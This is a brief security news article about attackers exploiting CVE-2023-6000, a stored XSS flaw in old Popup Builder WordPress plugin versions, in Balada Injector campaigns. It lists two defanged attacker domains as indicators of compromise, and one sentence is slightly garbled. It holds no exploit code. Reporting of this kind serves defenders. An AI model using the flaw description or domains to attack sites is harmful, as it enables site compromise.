March 11, 2024 By Pierluigi Paganini
Threat actors are hacking WordPress sites by exploiting a vulnerability, tracked as CVE-2023-6000, in old versions of the Popup Builder plugin.
In January, Sucuri researchers reported that Balada Injector malware infected over 7100 WordPress sites using a vulnerable version of the Popup Builder WordPress plugin. Sucurity reported that on December 13th, the Balada Injector campaign started infecting websites using older versions of the Popup Builder (CVE-2023-6000, CVSS score 8.8). The Popup Builder WordPress plugin before 4.2.3 does not prevent simple visitors from updating existing popups, and injecting raw JavaScript in them, which could lead to Stored XSS attacks.
In the past three weeks, the researchers observed a spike in attacks from a new malware campaign e this same exploiting the same flaw in Popup Builder. According to PublicWWW, threat actors already compromised over 3,300 websites. Sucuri’s SiteCheck remote malware scanner has detected Balada Injector malware on over 1,170 sites.
These attacks originated from two domains registered on February 12th, 2024:
- ttincoming.traveltraffic[.]cc
- host.cloudsonicwave[.]com
